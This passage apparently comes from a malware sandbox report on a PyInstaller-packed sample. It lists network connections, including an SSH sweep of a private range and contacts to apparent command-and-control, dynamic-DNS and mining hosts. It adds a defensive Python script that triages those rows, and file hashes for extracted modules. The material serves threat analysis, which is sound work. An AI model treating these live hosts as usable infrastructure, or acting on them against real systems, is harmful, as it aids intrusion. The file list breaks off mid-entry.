| US | 8.8.8.8:53 | 167.57.26.184.in-addr.arpa | udp |
| GB | 89.197.154.115:7700 | | tcp |
| N/A | 10.127.0.15:22 | | tcp |
| N/A | 10.127.0.20:22 | | tcp |
| N/A | 10.127.0.11:22 | | tcp |
| N/A | 10.127.0.12:22 | | tcp |
| N/A | 10.127.0.18:22 | | tcp |
| N/A | 10.127.0.16:22 | | tcp |
| N/A | 10.127.0.19:22 | | tcp |
| N/A | 10.127.0.14:22 | | tcp |
| N/A | 10.127.0.17:22 | | tcp |
| N/A | 10.127.0.13:22 | | tcp |
| US | 8.8.8.8:53 | 154.141.79.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| BE | 74.125.206.84:443 | accounts.google.com | tcp |
| GB | 8.208.41.172:80 | c3poolbat.oss-accelerate.aliyuncs.com | tcp |
| NL | 82.168.179.78:1978 | mohibkal.publicvm.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| US | 154.216.20.237:80 | 154.216.20.237 | tcp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.206.125.74.in-addr.arpa | udp |
| IR | 185.94.96.102:80 | armanayegh.com | tcp |
| N/A | 10.127.0.29:22 | | tcp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| N/A | 10.127.0.25:22 | | tcp |
| GB | 216.58.212.227:443 | update.googleapis.com | tcp |
| N/A | 10.127.0.22:22 | | tcp |
| N/A | 10.127.0.24:22 | | tcp |
| N/A | 10.127.0.23:22 | | tcp |
| N/A | 10.127.0.26:22 | | tcp |
| N/A | 10.127.0.21:22 | | tcp |
| N/A | 10.127.0.28:22 | | tcp |
| N/A | 10.127.0.30:22 | | tcp |
| N/A | 10.127.0.27:22 | | tcp |
| TH | 154.197.69.165:7000 | | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| CN | 101.226.27.113:80 | by.haory.cn | tcp |
| KR | 221.143.49.222:80 | 221.143.49.222 | tcp |
| KR | 152.67.212.187:443 | | tcp |
| US | 8.8.8.8:53 | 102.96.94.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.49.143.221.in-addr.arpa | udp |
| GB | 8.208.41.172:80 | c3poolbat.oss-accelerate.aliyuncs.com | tcp |
| US | 20.83.148.22:80 | | tcp |
| GB | 216.58.212.227:443 | update.googleapis.com | tcp |
| US | 8.8.8.8:53 | 187.212.67.152.in-addr.arpa | udp |
| N/A | 10.127.0.34:22 | | tcp |
| N/A | 10.127.0.35:22 | | tcp |
| N/A | 10.127.0.33:22 | | tcp |
| N/A | 10.127.0.39:22 | | tcp |
| N/A | 10.127.0.32:22 | | tcp |
| CN | 123.6.40.248:80 | stdown.dinju.com | tcp |
| CN | 119.167.229.190:80 | mininews.kpzip.com | tcp |
| VN | 103.221.220.14:443 | noithaticon.vn | tcp |
| US | 8.8.8.8:53 | ini.sh-pp.com | udp |
| CN | 121.43.104.75:81 | | tcp |
| N/A | 10.127.0.37:22 | | tcp |
| N/A | 10.127.0.40:22 | | tcp |
| N/A | 10.127.0.38:22 | | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| N/A | 10.127.0.31:22 | | tcp |
| N/A | 10.127.0.36:22 | | tcp |
| GB | 89.197.154.115:7700 | | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| CN | 183.60.150.17:80 | | tcp |
| RU | 176.113.115.178:80 | 176.113.115.178 | tcp |
| GB | 91.238.160.241:80 | jtpdev.co.uk | tcp |
| BG | 88.213.212.10:80 | monastery.mlnk.net | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 194.147.99.181:80 | api.52kkg.com | tcp |
| CN | 47.108.236.50:8090 | | tcp |
| US | 8.8.8.8:53 | downsexv.com | udp |
| CN | 61.240.220.214:80 | stdown.dinju.com | tcp |
| US | 8.8.8.8:53 | 14.220.221.103.in-addr.arpa | udp |
| KR | 152.67.212.187:443 | | tcp |
| GB | 8.208.41.172:80 | c3poolbat.oss-accelerate.aliyuncs.com | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | 241.160.238.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.115.113.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.212.213.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.99.147.194.in-addr.arpa | udp |
| N/A | 10.127.0.44:22 | | tcp |
| N/A | 10.127.0.49:22 | | tcp |
| N/A | 10.127.0.43:22 | | tcp |
| N/A | 10.127.0.42:22 | | tcp |
| N/A | 10.127.0.46:22 | | tcp |
| N/A | 10.127.0.45:22 | | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| N/A | 10.127.0.47:22 | | tcp |
| N/A | 104.18.38.233:80 | | tcp |
| N/A | 10.127.0.41:22 | | tcp |
| N/A | 10.127.0.48:22 | | tcp |
| N/A | 10.127.0.50:22 | | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| JP | 111.217.175.54:80 | 111.217.175.54 | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | 54.175.217.111.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| CN | 117.72.70.169:80 | | tcp |
| US | 68.178.207.33:8000 | 68.178.207.33 | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| N/A | 10.127.0.57:22 | | tcp |
| N/A | 10.127.0.53:22 | | tcp |
| N/A | 10.127.0.55:22 | | tcp |
| N/A | 10.127.0.51:22 | | tcp |
| N/A | 10.127.0.58:22 | | tcp |
| N/A | 10.127.0.52:22 | | tcp |
| VN | 14.243.221.170:2654 | | tcp |
| N/A | 10.127.0.54:22 | | tcp |
| US | 8.8.8.8:53 | 33.207.178.68.in-addr.arpa | udp |
| N/A | 10.127.0.59:22 | | tcp |
| N/A | 10.127.0.56:22 | | tcp |
| TH | 58.9.110.23:18063 | | tcp |
| US | 20.83.148.22:80 | | tcp |
| N/A | 10.127.0.60:22 | | tcp |
| CN | 180.163.148.218:80 | download.haozip.com | tcp |
| CN | 61.160.192.117:80 | | tcp |
| CN | 218.12.76.158:80 | | tcp |
| GB | 89.197.154.115:7700 | | tcp |
| CN | 47.101.28.200:80 | ini.sh-pp.com | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| N/A | 10.127.0.63:22 | | tcp |
| N/A | 10.127.0.61:22 | | tcp |
| SG | 158.140.133.56:8090 | 158.140.133.56 | tcp |
| KR | 183.115.102.3:80 | | tcp |
| US | 166.167.172.14:8240 | 166.167.172.14 | tcp |
| US | 8.8.8.8:53 | data.yhydl.com | udp |
| DE | 172.105.66.118:80 | 172-105-66-118.ip.linodeusercontent.com | tcp |
| US | 172.67.189.30:80 | downsexv.com | tcp |
| N/A | 10.127.0.68:22 | | tcp |
| N/A | 10.127.0.64:22 | | tcp |
| N/A | 10.127.0.66:22 | | tcp |
| N/A | 10.127.0.65:22 | | tcp |
| N/A | 10.127.0.62:22 | | tcp |
| N/A | 10.127.0.67:22 | | tcp |
| N/A | 10.127.0.70:22 | | tcp |
| US | 8.8.8.8:53 | 30.189.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.133.140.158.in-addr.arpa | udp |
| N/A | 10.127.0.69:22 | | tcp |
| PL | 185.241.208.156:80 | 185.241.208.156 | tcp |
| AT | 91.142.27.138:80 | 91.142.27.138 | tcp |
| ES | 47.62.190.226:80 | 47.62.190.226 | tcp |
| VN | 103.77.173.146:7707 | ser.nrovn.xyz | tcp |
| US | 8.8.8.8:53 | 156.208.241.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.27.142.91.in-addr.arpa | udp |
| N/A | 10.127.0.74:22 | | tcp |
| N/A | 10.127.0.71:22 | | tcp |
| US | 20.83.148.22:80 | | tcp |
| N/A | 10.127.0.73:22 | | tcp |
| N/A | 10.127.0.76:22 | | tcp |
| N/A | 10.127.0.72:22 | | tcp |
| N/A | 10.127.0.75:22 | | tcp |
| N/A | 10.127.0.77:22 | | tcp |
| N/A | 10.127.0.78:22 | | tcp |
| N/A | 10.127.0.79:22 | | tcp |
| N/A | 10.127.0.80:22 | | tcp |
| IE | 185.166.142.22:443 | bitbucket.org | tcp |
| TH | 147.50.240.62:80 | 147.50.240.62 | tcp |
| CN | 112.5.156.15:20006 | data.yhydl.com | tcp |
| US | 8.8.8.8:53 | files5.uludagbilisim.com | udp |
| IN | 103.117.156.102:80 | 103.117.156.102 | tcp |
| HK | 143.92.62.107:80 | 143.92.62.107 | tcp |
| VE | 167.250.49.155:80 | 167.250.49.155 | tcp |
| US | 8.8.8.8:53 | www.medises.co.kr | udp |
| US | 8.8.8.8:53 | 22.142.166.185.in-addr.arpa | udp |
| US | 20.83.148.22:80 | | tcp |
| N/A | 10.127.0.88:22 | | tcp |
| N/A | 10.127.0.83:22 | | tcp |
| N/A | 10.127.0.87:22 | | tcp |
| US | 8.8.8.8:53 | 62.240.50.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.156.117.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.49.250.167.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.62.92.143.in-addr.arpa | udp |
| N/A | 10.127.0.82:22 | | tcp |
| N/A | 10.127.0.84:22 | | tcp |
| N/A | 10.127.0.86:22 | | tcp |
| N/A | 10.127.0.85:22 | | tcp |
| N/A | 10.127.0.81:22 | | tcp |
| US | 8.8.8.8:53 | panpoppo-25611.portmap.io | udp |
| DE | 172.105.66.118:8080 | 172-105-66-118.ip.linodeusercontent.com | tcp |
| DE | 193.161.193.99:25611 | panpoppo-25611.portmap.io | tcp |
| N/A | 10.127.0.90:22 | | tcp |
| N/A | 10.127.0.89:22 | | tcp |
| GB | 89.197.154.115:7700 | | tcp |
| CN | 39.105.31.193:1389 | | tcp |
| US | 20.83.148.22:80 | | tcp |
| N/A | 10.127.0.98:22 | | tcp |
| N/A | 10.127.0.91:22 | | tcp |
| N/A | 10.127.0.95:22 | | tcp |
| N/A | 10.127.0.93:22 | | tcp |
| CN | 61.131.3.86:9991 | | tcp |
| DE | 85.22.139.189:80 | 85.22.139.189 | tcp |
| N/A | 10.127.0.94:22 | | tcp |
| N/A | 10.127.0.100:22 | | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| N/A | 10.127.0.99:22 | | tcp |
| N/A | 10.127.0.96:22 | | tcp |
| US | 8.8.8.8:53 | 189.139.22.85.in-addr.arpa | udp |
| N/A | 10.127.0.97:22 | | tcp |
| N/A | 10.127.0.92:22 | | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| RU | 176.113.115.178:80 | 176.113.115.178 | tcp |
| RU | 176.113.115.178:80 | 176.113.115.178 | tcp |
| CN | 101.226.27.111:80 | by.haory.cn | tcp |
| CN | 116.62.242.43:80 | | tcp |
| NL | 185.202.113.6:80 | | tcp |
| TR | 46.20.5.15:80 | files5.uludagbilisim.com | tcp |
| CN | 61.160.195.64:80 | 139520.aioc.qbgxl.com | tcp |
| KR | 114.201.95.60:80 | www.medises.co.kr | tcp |
| KR | 27.102.130.169:801 | | tcp |
| CN | 36.110.15.211:9000 | | tcp |
| CN | 223.247.198.16:8072 | | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | 15.5.20.46.in-addr.arpa | udp |
| N/A | 10.127.0.105:22 | | tcp |
| N/A | 10.127.0.108:22 | | tcp |
| N/A | 10.127.0.101:22 | | tcp |
| N/A | 10.127.0.102:22 | | tcp |
| N/A | 10.127.0.103:22 | | tcp |
| N/A | 10.127.0.107:22 | | tcp |
| N/A | 10.127.0.106:22 | | tcp |
| N/A | 10.127.0.109:22 | | tcp |
| N/A | 10.127.0.104:22 | | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | 60.95.201.114.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.seetrol.com | udp |
| US | 13.58.157.220:10640 | | tcp |
| US | 20.83.148.22:80 | | tcp |
| N/A | 10.127.0.110:22 | | tcp |
| KR | 139.150.75.206:80 | www.seetrol.com | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 20.83.148.22:80 | | tcp |
| US | 8.8.8.8:53 | 206.75.150.139.in-addr.arpa | udp |
| N/A | 10.127.0.113:22 | | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| N/A | 10.127.0.115:22 | | tcp |
| N/A | 10.127.0.114:22 | | tcp |
| N/A | 10.127.0.118:22 | | tcp |
| N/A | 10.127.0.111:22 | | tcp |
| N/A | 10.127.0.112:22 | | tcp |
| N/A | 10.127.0.116:22 | | tcp |
| N/A | 10.127.0.117:22 | | tcp |
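The table above mixes four kinds of traffic that should not be treated alike: DNS queries to 8.8.8.8 (a large share of them PTR lookups under in-addr.arpa), a sequential sweep of port 22 across the private 10.127.0.0/16 range, contacts to Google and certificate infrastructure, and the endpoints that actually matter for blocking and hunting: dynamic-DNS and port-forwarding hosts (portmap.io, publicvm.com, mooo.com via freedns.afraid.org), high-numbered ports such as 7700, 18063 and 25611, and the external-IP check against ip-api.com. The Python script below is an added example, not part of the sandbox report or its tooling. It parses rows in the table's own layout, including the flattened form where an empty domain cell was dropped and the protocol slid into the domain column, deduplicates them, and sorts them into those buckets. The sample rows are constructed from the table; BENIGN_SUFFIXES, DYNDNS_SUFFIXES, IP_LOOKUP_HOSTS and the sweep threshold are the triager's assumptions, not findings of the report.

```python
"""Triage the sandbox network table: parse, dedupe and bucket connections.
Added example; the suffix lists and thresholds are triager assumptions."""
import ipaddress
from collections import defaultdict

# Constructed sample in the table's own layout, including the flattened form
# (| tcp | |) the extraction produced for rows that had no domain.
SAMPLE_ROWS = """\
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 10.127.0.1:22 | | tcp |
| N/A | 10.127.0.2:22 | tcp | |
| N/A | 10.127.0.117:22 | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| DE | 193.161.193.99:25611 | panpoppo-25611.portmap.io | tcp |
| VN | 103.77.173.146:6606 | ser.nrovn.xyz | tcp |
| TH | 58.9.110.23:18063 | tcp | |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
"""

# Assumed lists maintained by the triager; not findings from the report.
BENIGN_SUFFIXES = ("google.com", "googleapis.com", "pki.goog")
DYNDNS_SUFFIXES = ("portmap.io", "publicvm.com", "mooo.com", "afraid.org")
IP_LOOKUP_HOSTS = ("ip-api.com",)
STANDARD_PORTS = {53, 80, 443}


def parse_row(line):
    """Return {cc, ip, port, domain, proto} for one table row, else None.

    Handles both the clean layout and the flattened one where the empty
    domain cell was dropped and the protocol slid left."""
    cells = [c.strip() for c in line.strip().strip("|").split("|")]
    if len(cells) < 3 or ":" not in cells[1]:
        return None
    tail = cells[2:]
    proto = next((c for c in tail if c in ("tcp", "udp")), None)
    if proto is None:
        return None
    domain = next((c for c in tail if c and c != proto), "")
    ip, port = cells[1].rsplit(":", 1)
    return {"cc": cells[0], "ip": ip, "port": int(port),
            "domain": domain, "proto": proto}


def _matches(host, suffixes):
    return any(host == s or host.endswith("." + s) for s in suffixes)


def classify(rec):
    """dns: resolver traffic; internal: private target; benign: allowlisted;
    candidate: everything else, i.e. what goes into the IOC review."""
    if rec["port"] == 53 and rec["proto"] == "udp":
        return "dns"
    if ipaddress.ip_address(rec["ip"]).is_private:
        return "internal"
    if _matches(rec["domain"], BENIGN_SUFFIXES):
        return "benign"
    return "candidate"


def flags_for(rec):
    """Reasons a candidate endpoint deserves a closer look."""
    flags = []
    if rec["port"] not in STANDARD_PORTS:
        flags.append("nonstandard-port")
    if _matches(rec["domain"], DYNDNS_SUFFIXES):
        flags.append("dyndns")
    if _matches(rec["domain"], IP_LOOKUP_HOSTS):
        flags.append("ip-lookup")
    if not rec["domain"]:
        flags.append("no-domain")
    return flags


def triage(text, sweep_threshold=8):
    """Parse every row, drop exact duplicates, bucket them, and report ports
    on which at least sweep_threshold distinct private hosts were contacted
    (a lateral scan rather than a C2 channel)."""
    buckets = defaultdict(list)
    seen = set()
    for line in text.splitlines():
        rec = parse_row(line)
        if rec is None:
            continue
        key = (rec["ip"], rec["port"], rec["domain"], rec["proto"])
        if key in seen:
            continue
        seen.add(key)
        label = classify(rec)
        if label == "candidate":
            rec["flags"] = flags_for(rec)
        buckets[label].append(rec)
    hosts_per_port = defaultdict(set)
    for rec in buckets["internal"]:
        hosts_per_port[rec["port"]].add(rec["ip"])
    buckets["sweeps"] = sorted((p, len(h)) for p, h in hosts_per_port.items()
                               if len(h) >= sweep_threshold)
    buckets["ptr_lookups"] = sum(
        1 for r in buckets["dns"] if r["domain"].endswith(".in-addr.arpa"))
    return dict(buckets)


if __name__ == "__main__":
    result = triage(SAMPLE_ROWS, sweep_threshold=3)
    print("port sweeps (port, hosts):", result["sweeps"])
    for rec in result["candidate"]:
        print(f'{rec["ip"]}:{rec["port"]:<6} {rec["domain"] or "-":30} '
              f'{",".join(rec["flags"])}')
```

Feeding the whole table in place of SAMPLE_ROWS gives the short list worth acting on; the repeated kotov.lol:443, the 7700/18063/25611 endpoints and the dynamic-DNS names stand out once the resolver noise, the internal sweep and the Google traffic are set aside. Raise or lower sweep_threshold to match how many hosts a scan must touch before it is reported as one.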
Files
C:\Users\Admin\AppData\Local\Temp\_MEI24682\python311.dll
| MD5 | 9a24c8c35e4ac4b1597124c1dcbebe0f |
| SHA1 | f59782a4923a30118b97e01a7f8db69b92d8382a |
| SHA256 | a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7 |
| SHA512 | 9d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b |
C:\Users\Admin\AppData\Local\Temp\_MEI24682\VCRUNTIME140.dll
| MD5 | f12681a472b9dd04a812e16096514974 |
| SHA1 | 6fd102eb3e0b0e6eef08118d71f28702d1a9067c |
| SHA256 | d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8 |
| SHA512 | 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2 |
C:\Users\Admin\AppData\Local\Temp\_MEI24682\base_library.zip
| MD5 | 9836732a064983e8215e2e26e5b66974 |
| SHA1 | 02e9a46f5a82fa5de6663299512ca7cd03777d65 |
| SHA256 | 3dfe7d63f90833e0f3de22f450ed5ee29858bb12fe93b41628afe85657a3b61f |
| SHA512 | 1435ba9bc8d35a9336dee5db06944506953a1bcf340e9bdad834828170ce826dcfb1fa80274cd9df667e47b83348139b38ab317055a5a3e6824df15adf8a4d86 |
C:\Users\Admin\AppData\Local\Temp\_MEI24682\_ctypes.pyd
| MD5 | 6a9ca97c039d9bbb7abf40b53c851198 |
| SHA1 | 01bcbd134a76ccd4f3badb5f4056abedcff60734 |
| SHA256 | e662d2b35bb48c5f3432bde79c0d20313238af800968ba0faa6ea7e7e5ef4535 |
| SHA512 | dedf7f98afc0a94a248f12e4c4ca01b412da45b926da3f9c4cbc1d2cbb98c8899f43f5884b1bf1f0b941edaeef65612ea17438e67745962ff13761300910960d |
C:\Users\Admin\AppData\Local\Temp\_MEI24682\python3.DLL
| MD5 | 34e49bb1dfddf6037f0001d9aefe7d61 |
| SHA1 | a25a39dca11cdc195c9ecd49e95657a3e4fe3215 |
| SHA256 | 4055d1b9e553b78c244143ab6b48151604003b39a9bf54879dee9175455c1281 |
| SHA512 | edb715654baaf499cf788bcacd5657adcf9f20b37b02671abe71bda334629344415ed3a7e95cb51164e66a7aa3ed4bf84acb05649ccd55e3f64036f3178b7856 |
C:\Users\Admin\AppData\Local\Temp\_MEI24682\libffi-8.dll
| MD5 | 32d36d2b0719db2b739af803c5e1c2f5 |
| SHA1 | 023c4f1159a2a05420f68daf939b9ac2b04ab082 |
| SHA256 | 128a583e821e52b595eb4b3dda17697d3ca456ee72945f7ecce48ededad0e93c |
| SHA512 | a0a68cfc2f96cb1afd29db185c940e9838b6d097d2591b0a2e66830dd500e8b9538d170125a00ee8c22b8251181b73518b73de94beeedd421d3e888564a111c1 |
C:\Users\Admin\AppData\Local\Temp\_MEI24682\_uuid.pyd
| MD5 | 9a4957bdc2a783ed4ba681cba2c99c5c |
| SHA1 | f73d33677f5c61deb8a736e8dde14e1924e0b0dc |
| SHA256 | f7f57807c15c21c5aa9818edf3993d0b94aef8af5808e1ad86a98637fc499d44 |
| SHA512 | 027bdcb5b3e0ca911ee3c94c42da7309ea381b4c8ec27cf9a04090fff871db3cf9b7b659fdbcfff8887a058cb9b092b92d7d11f4f934a53be81c29ef8895ac2b |
C:\Users\Admin\AppData\Local\Temp\_MEI24682\_ssl.pyd
| MD5 | 069bccc9f31f57616e88c92650589bdd |
| SHA1 | 050fc5ccd92af4fbb3047be40202d062f9958e57 |
| SHA256 | cb42e8598e3fa53eeebf63f2af1730b9ec64614bda276ab2cd1f1c196b3d7e32 |
| SHA512 | 0e5513fbe42987c658dba13da737c547ff0b8006aecf538c2f5cf731c54de83e26889be62e5c8a10d2c91d5ada4d64015b640dab13130039a5a8a5ab33a723dc |
C:\Users\Admin\AppData\Local\Temp\_MEI24682\_socket.pyd
| MD5 | 8140bdc5803a4893509f0e39b67158ce |
| SHA1 | 653cc1c82ba6240b0186623724aec3287e9bc232 |
| SHA256 | 39715ef8d043354f0ab15f62878530a38518fb6192bc48da6a098498e8d35769 |
| SHA512 | d0878fee92e555b15e9f01ce39cfdc3d6122b41ce00ec3a4a7f0f661619f83ec520dca41e35a1e15650fb34ad238974fe8019577c42ca460dde76e3891b0e826 |
C:\Users\Admin\AppData\Local\Temp\_MEI24682\_queue.pyd
| MD5 | ff8300999335c939fcce94f2e7f039c0 |
| SHA1 | 4ff3a7a9d9ca005b5659b55d8cd064d2eb708b1a |
| SHA256 | 2f71046891ba279b00b70eb031fe90b379dbe84559cf49ce5d1297ea6bf47a78 |
| SHA512 | f29b1fd6f52130d69c8bd21a72a71841bf67d54b216febcd4e526e81b499b9b48831bb7cdff0bff6878aab542ca05d6326b8a293f2fb4dd95058461c0fd14017 |
C:\Users\Admin\AppData\Local\Temp\_MEI24682\_overlapped.pyd
| MD5 | 01ad7ca8bc27f92355fd2895fc474157 |
| SHA1 | 15948cd5a601907ff773d0b48e493adf0d38a1a6 |
| SHA256 | a083e83f609ed7a2fc18a95d44d8f91c9dc74842f33e19e91988e84db94c3b5b |
| SHA512 | 8fe6ac8430f8dde45c74f45575365753042642dc9fa9defbcf25ae1832baf6abb1ea1ad6d087e4ece5d0590e36cee1beea99845aef6182c1eec4bafdf9557604 |
C:\Users\Admin\AppData\Local\Temp\_MEI24682\_multiprocessing.pyd
| MD5 | 1386dbc6dcc5e0be6fef05722ae572ec |
| SHA1 | 470f2715fafd5cafa79e8f3b0a5434a6da78a1ba |
| SHA256 | 0ae3bf383ff998886f97576c55d6bf0a076c24395cf6fcd2265316e9a6e8c007 |
| SHA512 | ca6e5c33273f460c951cb8ec1d74ce61c0025e2ead6d517c18a6b0365341a0fd334e8976006cd62b72eb5620ccc42cfdd5196e8b10691b8f19f69f851a440293 |
C:\Users\Admin\AppData\Local\Temp\_MEI24682\_lzma.pyd
| MD5 | 337b0e65a856568778e25660f77bc80a |
| SHA1 | 4d9e921feaee5fa70181eba99054ffa7b6c9bb3f |
| SHA256 | 613de58e4a9a80eff8f8bc45c350a6eaebf89f85ffd2d7e3b0b266bf0888a60a |
| SHA512 | 19e6da02d9d25ccef06c843b9f429e6b598667270631febe99a0d12fc12d5da4fb242973a8351d3bf169f60d2e17fe821ad692038c793ce69dfb66a42211398e |
C:\Users\Admin\AppData\Local\Temp\_MEI24682\_hashlib.pyd
| MD5 | de4d104ea13b70c093b07219d2eff6cb |
| SHA1 | 83daf591c049f977879e5114c5fea9bbbfa0ad7b |
| SHA256 | 39bc615842a176db72d4e0558f3cdcae23ab0623ad132f815d21dcfbfd4b110e |
| SHA512 | 567f703c2e45f13c6107d767597dba762dc5caa86024c87e7b28df2d6c77cd06d3f1f97eed45e6ef127d5346679fea89ac4dc2c453ce366b6233c0fa68d82692 |
C:\Users\Admin\AppData\Local\Temp\_MEI24682\_decimal.pyd
| MD5 | d47e6acf09ead5774d5b471ab3ab96ff |
| SHA1 | 64ce9b5d5f07395935df95d4a0f06760319224a2 |
| SHA256 | d0df57988a74acd50b2d261e8b5f2c25da7b940ec2aafbee444c277552421e6e |
| SHA512 | 52e132ce94f21fa253fed4cf1f67e8d4423d8c30224f961296ee9f64e2c9f4f7064d4c8405cd3bb67d3cf880fe4c21ab202fa8cf677e3b4dad1be6929dbda4e2 |
C:\Users\Admin\AppData\Local\Temp\_MEI24682\_cffi_backend.cp311-win_amd64.pyd
| MD5 | 739d352bd982ed3957d376a9237c9248 |
| SHA1 | 961cf42f0c1bb9d29d2f1985f68250de9d83894d |
| SHA256 | 9aee90cf7980c8ff694bb3ffe06c71f87eb6a613033f73e3174a732648d39980 |
| SHA512 | 585a5143519ed9b38bb53f912cea60c87f7ce8ba159a1011cf666f390c2e3cc149e0ac601b008e039a0a78eaf876d7a3f64fff612f5de04c822c6e214bc2efde |
C:\Users\Admin\AppData\Local\Temp\_MEI24682\_bz2.pyd
| MD5 | 4101128e19134a4733028cfaafc2f3bb |
| SHA1 | 66c18b0406201c3cfbba6e239ab9ee3dbb3be07d |
| SHA256 | 5843872d5e2b08f138a71fe9ba94813afee59c8b48166d4a8eb0f606107a7e80 |
| SHA512 | 4f2fc415026d7fd71c5018bc2ffdf37a5b835a417b9e5017261849e36d65375715bae148ce8f9649f9d807a63ac09d0fb270e4abae83dfa371d129953a5422ca |
C:\Users\Admin\AppData\Local\Temp\_MEI24682\_brotli.cp311-win_amd64.pyd
| MD5 | d9fc15caf72e5d7f9a09b675e309f71d |
| SHA1 | cd2b2465c04c713bc58d1c5de5f8a2e13f900234 |
| SHA256 | 1fcd75b03673904d9471ec03c0ef26978d25135a2026020e679174bdef976dcf |
| SHA512 | 84f705d52bd3e50ac412c8de4086c18100eac33e716954fbcb3519f4225be1f4e1c3643d5a777c76f7112fae30ce428e0ce4c05180a52842dacb1f5514460006 |
C:\Users\Admin\AppData\Local\Temp\_MEI24682\_asyncio.pyd
| MD5 | 2859c39887921dad2ff41feda44fe174 |
| SHA1 | fae62faf96223ce7a3e6f7389a9b14b890c24789 |
| SHA256 | aebc378db08617ea81a0a3a3bc044bcc7e6303e314630392dd51bab12f879bd9 |
| SHA512 | 790be0c95c81eb6d410e53fe8018e2ca5efd1838dc60539ebb011911c36c8478333ee95989cfd1ddaf4f892b537ae8305eb4cd893906930deae59c8965cf2fbb |
C:\Users\Admin\AppData\Local\Temp\_MEI24682\unicodedata.pyd
| MD5 | bc58eb17a9c2e48e97a12174818d969d |
| SHA1 | 11949ebc05d24ab39d86193b6b6fcff3e4733cfd |
| SHA256 | ecf7836aa0d36b5880eb6f799ec402b1f2e999f78bfff6fb9a942d1d8d0b9baa |
| SHA512 | 4aa2b2ce3eb47503b48f6a888162a527834a6c04d3b49c562983b4d5aad9b7363d57aef2e17fe6412b89a9a3b37fb62a4ade4afc90016e2759638a17b1deae6c |
C:\Users\Admin\AppData\Local\Temp\_MEI24682\select.pyd
| MD5 | 97ee623f1217a7b4b7de5769b7b665d6 |
| SHA1 | 95b918f3f4c057fb9c878c8cc5e502c0bd9e54c0 |
| SHA256 | 0046eb32f873cde62cf29af02687b1dd43154e9fd10e0aa3d8353d3debb38790 |
| SHA512 | 20edc7eae5c0709af5c792f04a8a633d416da5a38fc69bd0409afe40b7fb1afa526de6fe25d8543ece9ea44fd6baa04a9d316ac71212ae9638bdef768e661e0f |
C:\Users\Admin\AppData\Local\Temp\_MEI24682\pyexpat.pyd
| MD5 | 1c0a578249b658f5dcd4b539eea9a329 |
| SHA1 | efe6fa11a09dedac8964735f87877ba477bec341 |
| SHA256 | d97f3e27130c267e7d3287d1b159f65559e84ead9090d02a01b4c7dc663cd509 |
| SHA512 | 7b21dcd7b64eeba13ba8a618960190d1a272fa4805dedcf8f9e1168aebfe890b0ced991435ecbd353467a046fc0e8307f9a9be1021742d7d93aa124c52cc49e6 |
C:\Users\Admin\AppData\Local\Temp\_MEI24682\libssl-1_1.dll
| MD5 | 8769adafca3a6fc6ef26f01fd31afa84 |
| SHA1 | 38baef74bdd2e941ccd321f91bfd49dacc6a3cb6 |
| SHA256 | 2aebb73530d21a2273692a5a3d57235b770daf1c35f60c74e01754a5dac05071 |
| SHA512 | fac22f1a2ffbfb4789bdeed476c8daf42547d40efe3e11b41fadbc4445bb7ca77675a31b5337df55fdeb4d2739e0fb2cbcac2feabfd4cd48201f8ae50a9bd90b |
C:\Users\Admin\AppData\Local\Temp\_MEI24682\libcrypto-1_1.dll
| MD5 | 6f4b8eb45a965372156086201207c81f |
| SHA1 | 8278f9539463f0a45009287f0516098cb7a15406 |
| SHA256 | 976ce72efd0a8aeeb6e21ad441aa9138434314ea07f777432205947cdb149541 |
